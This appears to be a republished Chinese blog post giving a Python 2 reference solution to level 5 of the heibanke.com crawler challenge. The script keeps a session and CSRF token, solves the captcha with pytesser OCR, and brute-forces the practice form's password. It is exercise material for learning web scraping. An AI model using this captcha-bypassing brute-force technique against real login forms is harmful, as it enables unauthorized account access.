黑板客 -- 爬蟲闖關 -- 關卡05
阿新 • • 發佈:2018-10-01
ref time pos download 模塊 pytho awl post dde
簡介
爬蟲闖關鏈接:
1. http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/
2. http://www.heibanke.com/lesson/crawler_ex04/
3. http://www.heibanke.com
知識點:cookie & session , csrf , Web編程,驗證碼識別模塊
提示:本題相較於前4題,難度在於驗證碼識別。為了方便起見,這裡直接使用網絡上現成的pytesser模塊;在64位Python上安裝PIL模塊時可能會遇到一點小麻煩,建議盡量使用32位Python。
pytesser模塊安裝及使用參考資料:
1. http://blog.csdn.net/evankaka/article/details/49533493
2. http://blog.csdn.net/tianxiawuzhei/article/details/44922843
3. http://blog.csdn.net/bigzhao_25/article/details/52350781
參考代碼
#!/usr/bin/env python
# encoding: utf-8
"""Password brute-forcer for the heibanke.com crawler challenge (crawler_ex04).

The script logs in with a fixed account, then posts every candidate password
to the challenge form.  Each post must carry a captcha answer, which is
obtained by downloading the captcha image and running it through pytesser.
When the server reports a captcha error, a fresh captcha is fetched and the
same password is retried.

This is Python 2 code (``reload(sys)``, ``sys.setdefaultencoding`` and
pytesser are Python 2 only).  ``print`` is called with a single parenthesised
argument, which behaves identically to the Python 2 print statement.
"""
import requests
import sys
import re
import threading
from pytesser import *  # supplies Image and image_to_string used below

reload(sys)
sys.setdefaultencoding("utf-8")

csrf = ""
username = "Peter"
password = "112233"
captcha_0 = ""
captcha_1 = ""
attack_password = ""

website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/"
website_attack = "http://www.heibanke.com/lesson/crawler_ex04/"
website_imageBase = "http://www.heibanke.com"

# Local file the captcha image is saved to before OCR.
CAPTCHA_IMAGE_PATH = '1' + '.png'

# Candidate passwords tried by main(): the integers 0..30, sent as strings.
PASSWORD_CANDIDATES = range(31)

# Markers looked up in the raw response body, encoded once as UTF-8 bytes so
# the check does not depend on the setdefaultencoding() hack above.
# NOTE(review): these literals are Traditional Chinese; confirm the server
# really answers with these exact characters, otherwise neither check can
# ever match.
CAPTCHA_ERROR_MARKER = u'驗證碼輸入錯誤'.encode('utf8')
ERROR_MARKER = u'錯誤'.encode('utf8')

# Compiled once; they extract the captcha image path and the hidden captcha key.
_CAPTCHA_IMG_RE = re.compile(
    r'<img src="(.*?)" alt="captcha" class="captcha" />')
_CAPTCHA_KEY_RE = re.compile(
    r'<input id="id_captcha_0" name="captcha_0" type="hidden" value="(.*?)" />')

payload_login = {
    "username": username,
    "password": password,
    "csrfmiddlewaretoken": csrf,
}
payload_attack = {
    "username": username,
    "password": attack_password,
    "csrfmiddlewaretoken": csrf,
    "captcha_0": captcha_0,
    "captcha_1": captcha_1,
}

# One shared session so cookies (including the CSRF token) persist.
s = requests.Session()
s.get(website_login)
csrf = payload_login["csrfmiddlewaretoken"] = payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]


def _sync_csrf_token(session):
    """Copy the session's current ``csrftoken`` cookie into both payloads."""
    token = session.cookies["csrftoken"]
    payload_login["csrfmiddlewaretoken"] = token
    payload_attack["csrfmiddlewaretoken"] = token


def Test_verCode(image_path):
    """Open the image at ``image_path`` and return pytesser's OCR text."""
    image = Image.open(image_path)
    return image_to_string(image)


def getVerCode(resp):
    """Extract captcha data from the HTML in ``resp.content``.

    Stores the hidden ``captcha_0`` value in ``payload_attack`` and returns
    the absolute URL of the captcha image.

    Raises:
        ValueError: if the captcha image or hidden field is not in the page
            (the original code failed here with a bare IndexError).
    """
    image_paths = _CAPTCHA_IMG_RE.findall(resp.content)
    captcha_keys = _CAPTCHA_KEY_RE.findall(resp.content)
    if not image_paths or not captcha_keys:
        raise ValueError("captcha markup not found in response")
    payload_attack["captcha_0"] = captcha_keys[0]
    return website_imageBase + image_paths[0]


def downloadImage(Image_URL):
    """Download ``Image_URL`` and write its body to CAPTCHA_IMAGE_PATH.

    Raises:
        requests.exceptions.ConnectionError: if the download fails.
    """
    try:
        pic = requests.get(Image_URL, timeout=10)
    except requests.exceptions.ConnectionError:
        print('[-] Image can not download ')
        # Previously execution fell through and crashed on the unbound
        # ``pic``; surface the real error instead.
        raise
    with open(CAPTCHA_IMAGE_PATH, 'wb') as fp:
        fp.write(pic.content)


def get_attackResp(verCode_res, attack_password, s):
    """Post one password attempt and return the response.

    Args:
        verCode_res: OCR text of the captcha; only its first four
            characters are submitted as ``captcha_1``.
        attack_password: the password candidate to submit.
        s: the requests session used for the POST.
    """
    payload_attack["password"] = attack_password
    payload_attack["captcha_1"] = verCode_res[:4]
    resp_attack = s.post(website_attack, data=payload_attack)
    # Refresh the token in both payloads from the session cookie after the post.
    _sync_csrf_token(s)
    return resp_attack


def _refresh_captcha():
    """Re-post the login form, fetch the captcha it returns and OCR it."""
    resp_login = s.post(website_login, data=payload_login)
    _sync_csrf_token(s)
    downloadImage(getVerCode(resp_login))
    return Test_verCode(CAPTCHA_IMAGE_PATH)


def main():
    """Try every candidate password until a response lacks the error marker."""
    verCode_res = _refresh_captcha()
    for i in PASSWORD_CANDIDATES:
        resp_attack = get_attackResp(verCode_res, str(i), s)
        # A captcha error says nothing about the password: fetch a new
        # captcha and retry the same candidate until the captcha is accepted.
        while CAPTCHA_ERROR_MARKER in resp_attack.content:
            print("[-]VerCode ERROR: PW:" + payload_attack["password"] + " -- VERCODE:" + verCode_res)
            verCode_res = _refresh_captcha()
            resp_attack = get_attackResp(verCode_res, str(i), s)
        if ERROR_MARKER not in resp_attack.content:
            print("[+]FOUND PASSWORD:" + payload_attack["password"])
            print("\nTEXT:\n" + resp_attack.content.decode('utf8'))
            break


if __name__ == '__main__':
    main()
黑板客 -- 爬蟲闖關 -- 關卡05